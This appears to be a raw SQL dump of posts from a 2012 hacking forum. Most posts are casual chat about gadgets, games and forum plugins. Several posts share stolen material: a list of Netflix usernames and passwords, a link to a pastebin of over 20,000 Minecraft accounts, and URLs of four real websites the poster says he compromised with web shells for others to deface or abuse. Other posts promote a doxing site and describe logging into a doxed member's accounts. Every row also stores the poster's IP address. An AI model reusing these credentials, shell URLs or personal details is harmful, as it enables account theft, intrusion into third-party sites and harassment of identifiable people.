'31a9de552d4a0c85ac318d5dcadaabc3', '0', '0'); INSERT INTO mybb_posts VALUES('6211', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '2', 'Apathy', '1351027749', 'This happened to me as well. I was like wtf so I went on a different VPN and my account was all good so I was confused.', '173.206.177.215', '-1378962985', '0', '0', '0', '0', '1', 'a583927dc816a86a11a1805a1ce4761d', '0', '0'); INSERT INTO mybb_posts VALUES('6212', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '61', 'NXK', '1351028698', 'Ill try to lift the ban now, Unless joker is the only one who can do it?', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'b806d6162617473742511390b8fcf5dc', '0', '0'); INSERT INTO mybb_posts VALUES('6213', '613', '6176', '66', 'RE: Some Changes that will be made', '0', '199', 'Anonymous™', '1351028953', '[quote=\'iTzIpod\' pid=\'6176\' dateline=\'1350946897\']\r\n[img]http://i.imgur.com/p3p8L.gif[/img]\r\nThis is it. I like\r\n[/quote]\r\n\r\nHow can you not like this? It\'s perfect.', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '7e711eb93ea6c61af75e586d997366e8', '0', '0'); INSERT INTO mybb_posts VALUES('6214', '613', '6213', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1351029394', '[quote=\'Anonymous™\' pid=\'6213\' dateline=\'1351028953\']\r\n[quote=\'iTzIpod\' pid=\'6176\' dateline=\'1350946897\']\r\n[img]http://i.imgur.com/p3p8L.gif[/img]\r\nThis is it. I like\r\n[/quote]\r\n\r\nHow can you not like this? It\'s perfect.\r\n[/quote]\r\n\r\nWhen has anyone said they don\'t like it, I said I loved it aha.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '0f8a9fdfd5a0bd8db47d6e767a031de8', '0', '0'); INSERT INTO mybb_posts VALUES('6215', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '285', 'dccfoux', '1351030070', 'I have experience but I would hate setting yet another one up.', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', 'b896d50e603cfc23106aa56248a82ea9', '0', '0'); INSERT INTO mybb_posts VALUES('6216', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '285', 'dccfoux', '1351030175', 'omg this could be really helpful to me!', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '01f3362cf6b331ad626b0b89f7ece69e', '0', '0'); INSERT INTO mybb_posts VALUES('6217', '677', '3428', '24', 'RE: Windows Memory Limits', '0', '285', 'dccfoux', '1351030305', 'omg this is why I hate Microsoft. They are too pricey with their software. But then again with Apple they would make you pay $200 to upgrade, unless you do it yourself. Which is easy.', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', '76caf0212fb266a11aadce2b9c900eda', '0', '0'); INSERT INTO mybb_posts VALUES('6218', '1072', '0', '24', 'iPad Mini?', '0', '285', 'dccfoux', '1351030378', 'Ok, so Apple released their new iPad Mini. What do you guys think of it?', '71.239.97.104', '1206870376', '0', '0', '0', '0', '1', 'b12401873db5936e1f1bb76a1ce29489', '0', '0'); INSERT INTO mybb_posts VALUES('6219', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '3', '??????????¢™', '1351030388', 'This has to do with cloudflares downtime yesterday.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'e71876cf613078a0263e29e2d34af1c8', '0', '0'); INSERT INTO mybb_posts VALUES('6220', '1072', '6218', '24', 'RE: iPad Mini?', '0', '82', 'iTzIpod', '1351030904', 'Useless. They\'re kinda running out of ideas in a way. I mean iPad 1, iPad 2, & iPad 3, etc.. Kinda poinless.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '37ef66c0c8041cdad6d6e44b4333fc6d', '0', '0'); INSERT INTO mybb_posts VALUES('6221', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1351030965', 'I saw the movie Ted. Was still funny :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5adec641e377de0d7cc08dfef6ca4cb', '0', '0'); INSERT INTO mybb_posts VALUES('6222', '613', '2977', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1351031012', 'Oo. NXK using that Thesaurus. :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5c6d3e1da72e268288f4d6a258c3a0dd', '0', '0'); INSERT INTO mybb_posts VALUES('6223', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '82', 'iTzIpod', '1351031055', 'Are we going to have an actual Minecraft Server?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f454b31f1e45a6a1f44be93675aad416', '0', '0'); INSERT INTO mybb_posts VALUES('6224', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '199', 'Anonymous™', '1351031132', 'Welcome to L33thacking.net!\n:)', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', '19bfb3851ea7f163ec5f2b2c4941be48', '0', '0'); INSERT INTO mybb_posts VALUES('6225', '613', '6222', '66', 'RE: Some Changes that will be made', '0', '61', 'NXK', '1351031210', '[quote=\'iTzIpod\' pid=\'6222\' dateline=\'1351031012\']\r\nOo. NXK using that Thesaurus. :o\r\n[/quote]\r\n\r\nhow 2 englihs pls?', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '66a22eadf6541ece045782f57973b5c0', '0', '0'); INSERT INTO mybb_posts VALUES('6226', '613', '6225', '66', 'RE: Some Changes that will be made', '0', '82', 'iTzIpod', '1351031977', '[quote=\'NXK\' pid=\'6225\' dateline=\'1351031210\']\r\n[quote=\'iTzIpod\' pid=\'6222\' dateline=\'1351031012\']\r\nOo. NXK using that Thesaurus. :o\r\n[/quote]\r\n\r\nhow 2 englihs pls?\r\n[/quote]\r\n\r\nReported for LQ Post. Lool 8)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5eece5ff071a72dbd78d4574bd8c1583', '0', '0'); INSERT INTO mybb_posts VALUES('6227', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '82', 'iTzIpod', '1351033874', 'Gonna make my own Minecraft Server now. :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '77258efdd2cea16d60a04e3543068503', '0', '0'); INSERT INTO mybb_posts VALUES('6228', '1009', '6227', '74', 'RE: minecraft server setup tut', '0', '257', 'XxTREYZxX', '1351034467', '[quote=\'iTzIpod\' pid=\'6227\' dateline=\'1351033874\']\r\nGonna make my own Minecraft Server now. :)\r\n[/quote]\r\n\r\nThanks i\'m glad i helped you :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '8efaf63bfaaa657193e10657c09e2fd2', '0', '0'); INSERT INTO mybb_posts VALUES('6229', '1064', '6123', '4', 'RE: Greetings from NowhereLand', '0', '257', 'XxTREYZxX', '1351034623', 'Welcome to LH hope you stay active and HQ,\nEnjoy your stay :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', 'feaf78435c3de8bc23e37ca2832272f7', '0', '0'); INSERT INTO mybb_posts VALUES('6230', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '257', 'XxTREYZxX', '1351034717', 'I have alot of experience, just check out my thread if you wanna learn how to', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '453f3077b22fce1bdf6793f36322fb1d', '0', '0'); INSERT INTO mybb_posts VALUES('6231', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '257', 'XxTREYZxX', '1351034830', 'I just watched Ted, paranormal activity the new one,\nthere is lots of jumpy bits :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '075c2f1ed84605ab590c4055a7b0765b', '0', '0'); INSERT INTO mybb_posts VALUES('6232', '1072', '6218', '24', 'RE: iPad Mini?', '0', '257', 'XxTREYZxX', '1351034952', 'i think the ipad is shit house,my opinion :)', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '3ebd5e1ebc430879a90794ac27d726fa', '0', '0'); INSERT INTO mybb_posts VALUES('6233', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '257', 'XxTREYZxX', '1351035181', 'I\'m on 8-9 hours because of school if there was no school i would be at least 19 hours a day :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '83cbe204703155d96d3493dcd38f7798', '0', '0'); INSERT INTO mybb_posts VALUES('6234', '310', '1458', '13', 'RE: [ HOT ] How to Hack Your School Grading System [Change]', '0', '257', 'XxTREYZxX', '1351035469', 'Thanks for the share mate, even though i already knew how to do this :O', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '9cfb3b501ca27f5742d35fbbb805daf6', '0', '0'); INSERT INTO mybb_posts VALUES('6235', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351035766', 'wierd I use the same and still get the bug.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1858778d7e26b1cf5b72a3df245135d9', '0', '0'); INSERT INTO mybb_posts VALUES('6236', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '257', 'XxTREYZxX', '1351035870', 'I have the same problem mate', '203.104.11.14', '-882373874', '1', '0', '0', '0', '1', '50d28694df20569218517594f68ff159', '0', '0'); INSERT INTO mybb_posts VALUES('6237', '1072', '6218', '24', 'RE: iPad Mini?', '0', '1', 't3h jok3r', '1351042015', 'I think it\'s a waste of money, they are running out of ideas as Ipod said.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '55ddd15e6d93d4be7e774b4e2cc533ea', '0', '0'); INSERT INTO mybb_posts VALUES('6238', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '160', 'Jacob', '1351042147', 'Can you please make me one? Thanks :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', 'f480af362ff2a17cd3352f8d4008af2e', '0', '0'); INSERT INTO mybb_posts VALUES('6239', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '1', 't3h jok3r', '1351042404', 'I deactivated the plugin and plan on removing it because it has too many bugs.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '99a4834038aaf9b456ac65da98ad9081', '0', '0'); INSERT INTO mybb_posts VALUES('6240', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '82', 'iTzIpod', '1351043002', 'Jacob! Welcome back bro. :)\n\nLol. You probably just came back for a signature >_>\nHope you plan on being active in the future though! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'efab0c7c0ed76f5ede3f47e6f9466651', '0', '0'); INSERT INTO mybb_posts VALUES('6241', '1073', '0', '64', 'Free Premium Netflix logins', '0', '5', 'Timmy', '1351043037', 'mendez - mendez\r\nlauretta - lauretta\r\nytrewq - qwerty\r\nroyroy - royroy\r\ntommyboy - tommyboy\r\nQuigley - Quigley\r\n\r\nFeel free to change the password.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2c7f938478d65a5aba25d8dc0c72dcc7', '0', '0'); INSERT INTO mybb_posts VALUES('6242', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351043082', 'There is a plugin that\'s called Hide\n\n\nYou use [hide] [/hide] instead of [lock] [/lock]\no.O\n\nReally the same thing. \n\nYou can\'t quote to bypass it. You just have to simply post and it will show. \n\n(It only blocks the content in the [hide] [/hide] )', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a3945b609615e205e97ee7ce8cc81484', '0', '0'); INSERT INTO mybb_posts VALUES('6243', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '5', 'Timmy', '1351043686', '2-3 hours excluding browsing for homework etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '966b55a0d1a4de83c50229b3651bffd8', '0', '0'); INSERT INTO mybb_posts VALUES('6244', '1074', '0', '84', '[NEW] App Trailers Exploit [HOT!]', '0', '5', 'Timmy', '1351044408', 'Hope you guys enjoy, found in the HF Ub3r area.\r\n\r\n[img]http://i.imgur.com/99DIN.png[/img]\r\n\r\n[img]http://i.imgur.com/W9Zet.png[/img]\r\n\r\n[img]http://i.imgur.com/ZHR6I.png[/img]\r\n\r\n[img]http://i.imgur.com/IfS6d.png[/img]\r\n\r\n[img]http://i.imgur.com/945yi.png[/img]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0e62c1316c538e30530c3479d6b2d439', '0', '0'); INSERT INTO mybb_posts VALUES('6245', '1075', '0', '9', '? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '7', 'Romdu62', '1351045084', 'Methods pretty decent. Can work.\r\n\r\nScreenshot of thread:\r\nhttp://gyazo.com/669ce05c6521e1104ddf79af3a0541af.png?1351039127\r\n\r\nDownload:\r\n\r\nhttp://www.filedropper.com/amazonmethod\r\n\r\nDon\'t forget to Thank! ;)\r\nEnjoy all.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c506cadeae7568f171602e844970ec42', '0', '0'); INSERT INTO mybb_posts VALUES('6246', '1076', '0', '34', '157 Graffiti Fonts [the best of all]', '0', '7', 'Romdu62', '1351045281', '[align=center][size=medium]Hello,\r\nan other leak by me:[/size]\r\n\r\n[size=large][u][b]157 Graffiti Fonts[/b][/u][/size]\r\n\r\n[IMG]http://i.imgur.com/yqDlJ.gif[/IMG]\r\n\r\n[size=large]Direct Download Link: http://ge.tt/3Dqf8sP/v/0[/size][/align]', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '5bf8d13e54754013fd4e26e34fb02dc5', '0', '0'); INSERT INTO mybb_posts VALUES('6247', '1077', '0', '47', 'Free chocolates and drinks', '0', '7', 'Romdu62', '1351046027', 'I\'m hosting a contest and the winner will get free chocolates and drinks, any company of your choice or money of the amount the shit will cost at all.\n\nThis is real and I\'m Jok3rs classmate so you guys can trust me and you have to refer 5 people.', '72.231.24.165', '1223104677', '0', '0', '7', '1351046062', '1', '2a0f7eba5718defebbf4c239bd77d118', '0', '1351046062'); INSERT INTO mybb_posts VALUES('6248', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '1', 't3h jok3r', '1351048007', 'Thanks for the hide plugin. I will replace it very soon.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ae0b1d184cde09a12abd89d8656a5408', '0', '0'); INSERT INTO mybb_posts VALUES('6249', '1060', '6116', '3', 'RE: [Bug] with the new plugin', '0', '205', 'mothered', '1351051675', 'Same here, I experienced the same.\r\n\r\nIt can be rather annoying, when trying to establish whether your post has been submitted.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '6d76be5111a6ecd87f23bb5e4151f37a', '0', '0'); INSERT INTO mybb_posts VALUES('6250', '1072', '6218', '24', 'RE: iPad Mini?', '0', '205', 'mothered', '1351051939', 'I don\'t like It at all.\r\n\r\nIn fact, I don\'t like nearly all Apple products. Compatibility-wise, they\'re not suited to me.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'e91d9d5977d648ce3ed3c353d8ebcc2d', '0', '0'); INSERT INTO mybb_posts VALUES('6251', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '205', 'mothered', '1351052119', 'So what\'s the contest all about, and what does It Involve?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '293c12aade1bb2200460dc334acd2f1b', '0', '0'); INSERT INTO mybb_posts VALUES('6252', '947', '5329', '8', 'RE: GANGNAM STYLE', '0', '205', 'mothered', '1351052222', 'As much as I love the song, In my views, I believe this Is a one-hit wonder, hence when this dies down, we\'ll never hear from the artist again.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd26ce4fc91b48653e5a668362d15721a', '0', '0'); INSERT INTO mybb_posts VALUES('6253', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '257', 'XxTREYZxX', '1351056200', 'Thanks for these mate :O\nI will use them :P', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', 'f92b189a2f02921bf3f69aba3ff11117', '0', '0'); INSERT INTO mybb_posts VALUES('6254', '1078', '0', '7', 'Kasual/Rave\'s DOX (Thanks to NSA)', '0', '222', 'Exposé', '1351056377', 'Be sure to check out Kasual\'s Dox over at NSA - NotSoAnonymo.us. We are building a very strong Doxing team and hopefully you guys can signup and join the community. \r\n\r\nhttp://www.notsoanonymo.us/index.php?/topic/47-kasual-spushkin1/\r\n\r\n*Note - if you are nervous about being doxd please choose a username that nobody has ever used before! To eliminate that possibility\r\n\r\nCheck us out here at http://notsoanonymo.us today!', '74.76.76.132', '1246514308', '1', '0', '222', '1351066232', '1', '2e89d1862d4a6d01798b2573278bb4d5', '0', '1351066232'); INSERT INTO mybb_posts VALUES('6255', '1058', '6090', '24', 'RE: Microsoft or Apple', '0', '257', 'XxTREYZxX', '1351060814', 'Microsoft all the way :o\nIts just better in every way.\nthe only thing i like on the apple is the apple :o', '203.104.11.12', '-882373876', '1', '0', '0', '0', '1', '06ad5fef411e3a240cc57b1ac2640f12', '0', '0'); INSERT INTO mybb_posts VALUES('6256', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '228', 'VirtualLegend', '1351062028', 'Yeah I\'m Back :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '89a7ec197081fc3ef25b3dccc0f24e55', '0', '0'); INSERT INTO mybb_posts VALUES('6257', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '228', 'VirtualLegend', '1351062323', 'Nice This is the first giveaway involving food, I want to join :P', '81.18.248.110', '1360197742', '1', '0', '0', '0', '1', '0bff8e3cf895efe7b36b6a8803a58fa3', '0', '0'); INSERT INTO mybb_posts VALUES('6258', '1079', '0', '7', 'ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351064642', 'Hey LH,\r\ncan all you guys here add me on Skype,\r\nthanks Guys. is there like a group on Skype for LH.', '203.104.11.8', '-882373880', '1', '0', '0', '0', '1', 'f2cac4301d96cdfcd55976d751fa5277', '0', '0'); INSERT INTO mybb_posts VALUES('6259', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '222', 'Exposé', '1351065295', 'I can add you to our LH group chat :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', 'b2bc1287599c0633a75b1717a17f2ef7', '0', '0'); INSERT INTO mybb_posts VALUES('6260', '1079', '6259', '7', 'RE: ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351065582', '[quote=\'Exposé\' pid=\'6259\' dateline=\'1351065295\']\r\nI can add you to our LH group chat :D\r\n[/quote]\r\n\r\nYes please thanks so much', '203.104.11.9', '-882373879', '1', '0', '0', '0', '1', '9ab8116531e953520c3750438bedebb7', '0', '0'); INSERT INTO mybb_posts VALUES('6261', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '222', 'Exposé', '1351065668', 'lol good thought we lost you lmao', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '2f9e15da3735748233a9291ccdc75118', '0', '0'); INSERT INTO mybb_posts VALUES('6262', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '222', 'Exposé', '1351065722', 'Sent you a request you have to accept me first lol', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '526da7505a2b0b8d242e12507f2de95e', '0', '0'); INSERT INTO mybb_posts VALUES('6263', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351065915', 'yeah i know i cant go on today though sorry :)', '203.104.11.10', '-882373878', '1', '0', '0', '0', '1', '67461bff798650c13f08c88ed53e4cc1', '0', '0'); INSERT INTO mybb_posts VALUES('6264', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '222', 'Exposé', '1351066025', 'Oh lol ok...np just accept me whenever and ill add u to the chat :D', '74.76.76.132', '1246514308', '1', '0', '0', '0', '1', '30d7c1cb94948e8f6d7e560e51d481da', '0', '0'); INSERT INTO mybb_posts VALUES('6265', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '257', 'XxTREYZxX', '1351066183', 'Ok thanks man,\ni should be able to go on ToMorrow', '203.104.11.5', '-882373883', '1', '0', '0', '0', '1', '54357752edbc513fc132ddc56b61b729', '0', '0'); INSERT INTO mybb_posts VALUES('6266', '1075', '6245', '9', 'RE: ? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '62', 'R?????zo?', '1351070086', 'thanks I will try this out.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b7fddbae35cabbf4118436987b626f90', '0', '0'); INSERT INTO mybb_posts VALUES('6267', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '228', 'VirtualLegend', '1351089676', 'At school 5-6 Hours working/secretly gaming :P\nAt Home 4-5 Making my school work that i didn\'t make because i game to much :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'df2a07524856bebc1bb98c0622329661', '0', '0'); INSERT INTO mybb_posts VALUES('6268', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '100', '??zg???g????61', '1351090692', 'Around three to four hours a day on the weekend', '96.237.179.21', '1626190613', '1', '0', '0', '0', '1', '23a79b434330341f9194bb4706816f82', '0', '0'); INSERT INTO mybb_posts VALUES('6269', '1070', '6194', '7', 'RE: How many hours a day are you online?', '0', '258', 'PiXEL^OG', '1351091542', 'Half an hour daily , when this place gets more activity ill be on like 2 hours daily!!', '198.144.105.35', '-963614429', '0', '0', '0', '0', '1', 'f3f760cc890900d769ed59f445e76a9d', '0', '0'); INSERT INTO mybb_posts VALUES('6270', '1080', '0', '13', '[FREASH] 4 ASP shelled sites!!!![hacked]', '0', '258', 'PiXEL^OG', '1351091701', 'You guys can use these sites to upload your booter shells or just deface the sites. I hacked the site and uploaded some shells for you to use!!\n\nI only shelled 4 sites but that should be enough for us right? :)\n\nHere they are!!! :\n\nhttp://www.6408.com.cn/404.asp;.txt\nhttp://niceforyou.com.cn/404.asp;.txt\nhttp://events.ardmore.org/404.asp;.txt\nhttp://www.maqiduo.com/404.asp;.txt\n\n\nAnyways if you liked it then post your love down below , not then tell me why ya did not like it\n\nEnjoy!! :D', '198.144.105.35', '-963614429', '0', '0', '258', '1351093277', '1', '08823dfdfc056c30043b891127c1cc5e', '0', '1351093277'); INSERT INTO mybb_posts VALUES('6271', '609', '2944', '58', 'RE: Gamers Recruitment', '0', '228', 'VirtualLegend', '1351096729', '[i][b]Username:[/b][/i] [color=#C71585]VirtualLegend[/color]\r\n[i][b]Name:[/b][/i] [color=#FF1493]Classified Information[/color] :p \r\n[i][b]Age:[/b][/i] [color=#9400D3]16[/color]\r\n[i][b]Profile:[/b][/i] [color=#FF69B4]http://l33thacking.net/user-228.html[/color]\r\n[i][b]PSN:[/b][/i] [color=#DDA0DD]LegendaryMoker[/color]\r\n[i][b]Why should you accept me?:[/b][/i] [color=#9400D3]The reason why I\'m applying to the Gamer Group is not because of the cool userbar, but I can say proudly that I\'m a hardcore gamer. I play lots of games often, and i finish every game entirely. My favorite type of game is war like the Call of Duty series. Thats why I want to be a part of the group, so that i can post more threads involving gaming. I want also to game with the with the members of the Gamers group[/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd151968101fa04a01e96ca8bc217512d', '0', '0'); INSERT INTO mybb_posts VALUES('6272', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '228', 'VirtualLegend', '1351097060', 'Nice share Very handy to use Keep it up bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '4a55cef747be6d4dc2e366322786ddd0', '0', '0'); INSERT INTO mybb_posts VALUES('6273', '1074', '6244', '84', 'RE: [NEW] App Trailers Exploit [HOT!]', '0', '228', 'VirtualLegend', '1351097190', 'Nice Share\n\nThe Maker of this is f*cking smart', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a294e5a4668bbd75f42d7405ce9cf9bd', '0', '0'); INSERT INTO mybb_posts VALUES('6274', '532', '2668', '23', 'RE: Think you have an infection? Click Here.', '0', '228', 'VirtualLegend', '1351097331', 'Nice tutorial did you made it? cuz it\'s Awesome', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd9dedb0e8927bdc1cb68b8bab51c59ba', '0', '0'); INSERT INTO mybb_posts VALUES('6275', '1075', '6245', '9', 'RE: ? AMAZON GIFTCARD METHOD[$180-240/MONTH] ?', '0', '61', 'NXK', '1351105973', 'Ill try it out now and Post some feedback.\n\n\nNot really a good guide, Most of this is pretty common information and don\'t \"actually\" get you a amazon gift card, They earn you points to get one which may take awhile.', '99.252.235.12', '1677519628', '1', '0', '61', '1351106109', '1', 'b14f16856a08f95371f9149e1a3dbb3a', '0', '1351106109'); INSERT INTO mybb_posts VALUES('6276', '1078', '6254', '7', 'RE: Kasual/Rave\'s DOX (Thanks to NSA)', '0', '82', 'iTzIpod', '1351107524', 'Checked it out.\nGood job NSA! :)\n\nWhy did you guys dox him though? He\'s a member of LH isn\'t he?\n\nAlso, I checked his Adf.ly Account and the password was changed. Someone probably changed it due to his earnings or so.\nBut I checked his Adfoc.us Account and it worked. But the earnings are meh.\n\n$0.00052 or something. Lol.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ad436418c8607f9f4747e70c5c9ec7d3', '0', '0'); INSERT INTO mybb_posts VALUES('6277', '1060', '6248', '3', 'RE: [Bug] with the new plugin', '0', '82', 'iTzIpod', '1351107713', '[quote=\'t3h jok3r\' pid=\'6248\' dateline=\'1351048007\']\nThanks for the hide plugin. I will replace it very soon.\n[/quote]\n\nLeakForums had the plugin. That\'s how I knew about it :3 They just recently got it.', '24.212.197.164', '416597412', '1', '0', '82', '1351118341', '1', 'a6fa433509119f4e5e2a5f12c4f0815d', '0', '1351118341'); INSERT INTO mybb_posts VALUES('6278', '1077', '6247', '47', 'RE: Free chocolates and drinks', '0', '82', 'iTzIpod', '1351107775', 'How will you do so though?\n\nWhat do you mean by \"Free chocolates and drinks\"?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '28b63dc4fa23dfe2e2674f912335d5a5', '0', '0'); INSERT INTO mybb_posts VALUES('6279', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '61', 'NXK', '1351107788', 'Pretty awesome, Thanks for for this.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', 'f6dcf850d278e245689425e89e43194f', '0', '0'); INSERT INTO mybb_posts VALUES('6280', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '82', 'iTzIpod', '1351107811', 'Add me.\n\nSkype ID: iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ca1f9cb0a46adbaf4793c2bfb192e946', '0', '0'); INSERT INTO mybb_posts VALUES('6281', '1071', '6199', '3', 'RE: VirtualLegend - banned?', '0', '82', 'iTzIpod', '1351107900', 'Virtual or any Mod/SMod/Admin can junk & close this thread now..\nProblem\'s solved.\n\n\nOnly an Admin/Mod/SMod.\n\n@Trey you better not post saying\n\"Oh yeah I agree with iTzIpod that this thread should now be closed because the problem is solved.\" -.-', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8618563b7ab5777a98441c255ff8c9f5', '0', '0'); INSERT INTO mybb_posts VALUES('6282', '1076', '6246', '34', 'RE: 157 Graffiti Fonts [the best of all]', '0', '82', 'iTzIpod', '1351107969', 'Virus Scan?\nAnything?\n:o\n\n\nOther than that, thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5bb5f219e596facda5a98527760aeb95', '0', '0'); INSERT INTO mybb_posts VALUES('6283', '1079', '6258', '7', 'RE: ADD ME ON SKYPE', '0', '228', 'VirtualLegend', '1351108475', 'I have add you treyz', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '1b41c17d54365c96f5cacaaba5f95821', '0', '0'); INSERT INTO mybb_posts VALUES('6284', '1081', '0', '43', 'Minecraft Accounts!! Over 20,000!', '0', '160', 'Jacob', '1351109254', 'Get your Minecraft accounts here!\r\n\r\nTook it off a different forum\r\n\r\nhttp://pastebin.com/uLC0UTGe\r\n\r\nAll premium :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '92ea5489993e3c4abfb8802b06ccc64e', '0', '0'); INSERT INTO mybb_posts VALUES('6285', '900', '4929', '63', 'RE: Who wants a New Signature !!! | I will make one for you!', '0', '160', 'Jacob', '1351109621', 'No, just browsing around, and yeah I will try to be active here :)', '142.255.31.241', '-1895882767', '0', '0', '0', '0', '1', '7e6d004e88879a2b37c4cf02df64503f', '0', '0'); INSERT INTO mybb_posts VALUES('6286', '608', '2943', '66', 'RE: Welcome To Gamers!', '0', '228', 'VirtualLegend', '1351110916', 'GamerTag - N/A\nPSN - LegendaryMoker\nSteam - N/A\nSkype - VirtualLegend', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '51c67303fc1b89752223c18a384f1dae', '0', '0'); INSERT INTO mybb_posts VALUES('6287', '1082', '0', '74', 'WarZ', '0', '61', 'NXK', '1351111804', 'Anyone play? I switched from DayZ for this game and I love it atm.\r\n\r\nIf you play let me know we can play :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '7b164d70db598ec2a22fb839d8596189', '0', '0'); INSERT INTO mybb_posts VALUES('6288', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '2', 'Apathy', '1351112339', 'Downloading this\n\nThanks for the share.', '173.206.130.116', '-1378975116', '0', '0', '0', '0', '1', '6d1fade7c173d023aeec53394174b2dd', '0', '0'); INSERT INTO mybb_posts VALUES('6289', '1060', '6277', '3', 'RE: [Bug] with the new plugin', '0', '62', 'R?????zo?', '1351112771', '[quote=\'iTzIpod\' pid=\'6277\' dateline=\'1351107713\']\r\n[quote=\'t3h jok3r\' pid=\'6248\' dateline=\'1351048007\']\r\nThanks for the hide plugin. I will replace it very soon.\r\n[/quote]\r\n\r\nLH had the plugin. That\'s how I knew about it :3 